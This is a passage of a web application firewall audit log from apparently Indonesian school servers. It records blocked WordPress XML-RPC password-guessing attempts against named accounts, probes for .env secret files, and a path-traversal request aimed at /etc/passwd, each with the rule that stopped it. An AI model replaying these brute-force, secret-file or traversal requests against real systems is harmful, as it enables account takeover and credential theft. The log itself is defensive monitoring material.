User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_151) --33954631-C-- wp.getUsersBlogs timkreatif 1234%^&* --33954631-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --33954631-E-- --33954631-H-- Message: XML parser error: XML: Failed parsing document. Message: Warning. Match of "eq 0" against "REQBODY_ERROR" required. [file "/usr/local/apache/modsecurity-cwaf/rules/12_HTTP_Protocol.conf"] [line "27"] [id "210230"] [rev "2"] [msg "COMODO WAF: The request body could not be parsed. Possibility of an impedance mismatch attack. 
This is not a false positive.||smkn22-jkt.sch.id|F|2"] [data "XML parser error: XML: Failed parsing document."] [severity "CRITICAL"] [tag "CWAF"] [tag "Protocol"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749121461568065 4316 (- - -) Stopwatch2: 1749121461568065 4316; combined=3360, p1=372, p2=2821, p3=0, p4=0, p5=99, sr=98, sw=68, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --33954631-Z-- --d1bcd771-A-- [05/Jun/2025:18:04:40 +0700] aEF5yOth7G2xELALzPZb8AAAAME 103.236.140.4 55070 103.236.140.4 8181 --d1bcd771-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 1.14.93.149 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 1.14.93.149 X-Forwarded-Proto: http Connection: close Content-Length: 225 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_151) --d1bcd771-C-- wp.getUsersBlogs timkreatif paswod888 --d1bcd771-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --d1bcd771-E-- --d1bcd771-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. 
[file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 1.14.93.149 (66+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749121480829786 5061 (- - -) Stopwatch2: 1749121480829786 5061; combined=3707, p1=452, p2=3087, p3=0, p4=0, p5=99, sr=89, sw=69, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --d1bcd771-Z-- --ba0cb724-A-- [05/Jun/2025:18:05:40 +0700] aEF6BH-K7ToMdu-YSIJVxQAAAAY 103.236.140.4 55254 103.236.140.4 8181 --ba0cb724-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 1.14.93.149 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 1.14.93.149 X-Forwarded-Proto: http Connection: close Content-Length: 226 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_151) --ba0cb724-C-- wp.getUsersBlogs timkreatif basketball --ba0cb724-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --ba0cb724-E-- --ba0cb724-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. 
[file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 1.14.93.149 (84+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749121540641144 6005 (- - -) Stopwatch2: 1749121540641144 6005; combined=4119, p1=536, p2=3407, p3=0, p4=0, p5=105, sr=93, sw=71, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --ba0cb724-Z-- --3fc0fb30-A-- [05/Jun/2025:18:06:40 +0700] aEF6QCrHpfaS2Cuwh8UJKAAAAEM 103.236.140.4 55382 103.236.140.4 8181 --3fc0fb30-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 1.14.93.149 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 1.14.93.149 X-Forwarded-Proto: http Connection: close Content-Length: 224 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_151) --3fc0fb30-C-- wp.getUsersBlogs timkreatif victoria --3fc0fb30-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --3fc0fb30-E-- --3fc0fb30-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. 
[file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 1.14.93.149 (51+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749121600050293 4319 (- - -) Stopwatch2: 1749121600050293 4319; combined=3278, p1=354, p2=2750, p3=0, p4=0, p5=105, sr=81, sw=69, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --3fc0fb30-Z-- --e864dd77-A-- [05/Jun/2025:18:07:40 +0700] aEF6fCrHpfaS2Cuwh8UJVwAAAEM 103.236.140.4 55536 103.236.140.4 8181 --e864dd77-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 1.14.93.149 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 1.14.93.149 X-Forwarded-Proto: http Connection: close Content-Length: 223 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_151) --e864dd77-C-- wp.getUsersBlogs timkreatif xbox360 --e864dd77-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --e864dd77-E-- --e864dd77-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. 
[file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 1.14.93.149 (72+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749121660258559 4220 (- - -) Stopwatch2: 1749121660258559 4220; combined=3234, p1=355, p2=2713, p3=0, p4=0, p5=97, sr=80, sw=69, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --e864dd77-Z-- --e6b87967-A-- [05/Jun/2025:18:08:40 +0700] aEF6uFwdJdhOudw5hdz9UgAAAJE 103.236.140.4 55666 103.236.140.4 8181 --e6b87967-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 1.14.93.149 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 1.14.93.149 X-Forwarded-Proto: http Connection: close Content-Length: 222 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_151) --e6b87967-C-- wp.getUsersBlogs timkreatif louise --e6b87967-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --e6b87967-E-- --e6b87967-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. 
[file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 1.14.93.149 (45+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749121720706176 4753 (- - -) Stopwatch2: 1749121720706176 4753; combined=3546, p1=388, p2=2955, p3=0, p4=0, p5=115, sr=84, sw=88, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --e6b87967-Z-- --b9870025-A-- [05/Jun/2025:18:09:40 +0700] aEF69FwdJdhOudw5hdz9lAAAAIA 103.236.140.4 55854 103.236.140.4 8181 --b9870025-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 1.14.93.149 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 1.14.93.149 X-Forwarded-Proto: http Connection: close Content-Length: 224 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_151) --b9870025-C-- wp.getUsersBlogs timkreatif london12 --b9870025-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --b9870025-E-- --b9870025-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. 
[file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 1.14.93.149 (80+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749121780129459 4424 (- - -) Stopwatch2: 1749121780129459 4424; combined=3347, p1=344, p2=2836, p3=0, p4=0, p5=97, sr=80, sw=70, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --b9870025-Z-- --81c05a17-A-- [05/Jun/2025:18:10:33 +0700] aEF7KX-K7ToMdu-YSIJWNwAAAAU 103.236.140.4 56022 103.236.140.4 8181 --81c05a17-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 109.199.97.229 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 109.199.97.229 X-Forwarded-Proto: http Connection: close User-agent: Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30 Accept: */* --81c05a17-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --81c05a17-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. 
[file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749121833844244 648 (- - -) Stopwatch2: 1749121833844244 648; combined=266, p1=232, p2=0, p3=0, p4=0, p5=34, sr=67, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --81c05a17-Z-- --4f516256-A-- [05/Jun/2025:18:10:35 +0700] aEF7K3-K7ToMdu-YSIJWOQAAABY 103.236.140.4 56028 103.236.140.4 8181 --4f516256-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 109.199.97.229 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 109.199.97.229 X-Forwarded-Proto: https Connection: close User-agent: Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30 Accept: */* --4f516256-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --4f516256-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749121835262835 739 (- - -) Stopwatch2: 1749121835262835 739; combined=352, p1=248, p2=0, p3=0, p4=0, p5=104, sr=70, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --4f516256-Z-- --b7d2bc3a-A-- [05/Jun/2025:18:10:40 +0700] aEF7MOth7G2xELALzPZcNwAAAME 103.236.140.4 56046 103.236.140.4 8181 --b7d2bc3a-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 1.14.93.149 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 1.14.93.149 X-Forwarded-Proto: http Connection: close Content-Length: 220 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_151) --b7d2bc3a-C-- wp.getUsersBlogs miswan testtest --b7d2bc3a-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --b7d2bc3a-E-- --b7d2bc3a-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 1.14.93.149 (70+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749121840242570 5821 (- - -) Stopwatch2: 1749121840242570 5821; combined=4066, p1=488, p2=3408, p3=0, p4=0, p5=99, sr=88, sw=71, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --b7d2bc3a-Z-- --3c7aa15b-A-- [05/Jun/2025:18:10:47 +0700] aEF7N1wdJdhOudw5hdz9wgAAAJg 103.236.140.4 56084 103.236.140.4 8181 --3c7aa15b-B-- GET /.env HTTP/1.0 Host: vinic.twilightparadox.com X-Real-IP: 147.182.149.75 X-Forwarded-Host: vinic.twilightparadox.com X-Forwarded-Server: vinic.twilightparadox.com X-Forwarded-For: 147.182.149.75 X-Forwarded-Proto: https Connection: close User-Agent: Go-http-client/1.1 --3c7aa15b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --3c7aa15b-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749121847311538 683 (- - -) Stopwatch2: 1749121847311538 683; combined=252, p1=218, p2=0, p3=0, p4=0, p5=34, sr=67, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --3c7aa15b-Z-- --7bb9535b-A-- [05/Jun/2025:18:11:40 +0700] aEF7bH-K7ToMdu-YSIJWRwAAAAI 103.236.140.4 56240 103.236.140.4 8181 --7bb9535b-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 1.14.93.149 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 1.14.93.149 X-Forwarded-Proto: http Connection: close Content-Length: 222 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_151) --7bb9535b-C-- wp.getUsersBlogs miswan miswan1992 --7bb9535b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --7bb9535b-E-- --7bb9535b-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 1.14.93.149 (74+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749121900078134 4204 (- - -) Stopwatch2: 1749121900078134 4204; combined=3245, p1=372, p2=2707, p3=0, p4=0, p5=97, sr=82, sw=69, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --7bb9535b-Z-- --76ab3b3d-A-- [05/Jun/2025:18:12:46 +0700] aEF7rirHpfaS2Cuwh8UJYgAAAE0 103.236.140.4 56388 103.236.140.4 8181 --76ab3b3d-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 1.14.93.149 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 1.14.93.149 X-Forwarded-Proto: http Connection: close Content-Length: 226 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_151) --76ab3b3d-C-- wp.getUsersBlogs miswan marketing2013_ --76ab3b3d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --76ab3b3d-E-- --76ab3b3d-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 1.14.93.149 (68+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749121966525367 5222 (- - -) Stopwatch2: 1749121966525367 5222; combined=3716, p1=455, p2=3072, p3=0, p4=0, p5=110, sr=91, sw=79, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --76ab3b3d-Z-- --bfb7a16d-A-- [05/Jun/2025:18:13:36 +0700] aEF74FwdJdhOudw5hdz-IwAAAJc 103.236.140.4 56576 103.236.140.4 8181 --bfb7a16d-B-- GET /?umbrella-restore=1&filename=../../../../../../etc/passwd HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https User-Agent: Mozilla/5.0 (Kubuntu; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/133.0.0.0 Safari/537.36 Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 172954114 --bfb7a16d-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --bfb7a16d-E-- --bfb7a16d-H-- Message: Access denied with code 403 (phase 2). Match of "contains cpanel" against "REQUEST_URI" required. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "55"] [id "211190"] [rev "9"] [msg "COMODO WAF: Remote File Access Attempt||perpustakaan.smkn22jakarta.sch.id|F|2"] [data "Matched Data: /etc/ found within REQUEST_URI: /?umbrella-restore=1&filename=../../../../../../etc/passwd"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749122016425922 1626 (- - -) Stopwatch2: 1749122016425922 1626; combined=559, p1=354, p2=180, p3=0, p4=0, p5=25, sr=72, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --bfb7a16d-Z-- --3c398809-A-- [05/Jun/2025:18:13:51 +0700] aEF771wdJdhOudw5hdz-JAAAAJA 103.236.140.4 56588 103.236.140.4 8181 --3c398809-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 1.14.93.149 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 1.14.93.149 X-Forwarded-Proto: http Connection: close Content-Length: 220 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_151) --3c398809-C-- wp.getUsersBlogs miswan Admin888 --3c398809-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --3c398809-E-- --3c398809-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 1.14.93.149 (76+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749122031967515 5295 (- - -) Stopwatch2: 1749122031967515 5295; combined=3728, p1=451, p2=3107, p3=0, p4=0, p5=100, sr=88, sw=70, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --3c398809-Z-- --e880d201-A-- [05/Jun/2025:18:14:51 +0700] aEF8K3-K7ToMdu-YSIJWfwAAAAs 103.236.140.4 56726 103.236.140.4 8181 --e880d201-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 1.14.93.149 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 1.14.93.149 X-Forwarded-Proto: http Connection: close Content-Length: 227 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_151) --e880d201-C-- wp.getUsersBlogs miswan Administrator12 --e880d201-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --e880d201-E-- --e880d201-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 1.14.93.149 (64+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749122091410523 3855 (- - -) Stopwatch2: 1749122091410523 3855; combined=2603, p1=343, p2=2145, p3=0, p4=0, p5=68, sr=61, sw=47, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --e880d201-Z-- --a971dd11-A-- [05/Jun/2025:18:15:51 +0700] aEF8Z1wdJdhOudw5hdz-WAAAAJQ 103.236.140.4 56910 103.236.140.4 8181 --a971dd11-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 1.14.93.149 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 1.14.93.149 X-Forwarded-Proto: http Connection: close Content-Length: 221 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_151) --a971dd11-C-- wp.getUsersBlogs miswan 1qaz@2wsx --a971dd11-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --a971dd11-E-- --a971dd11-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file 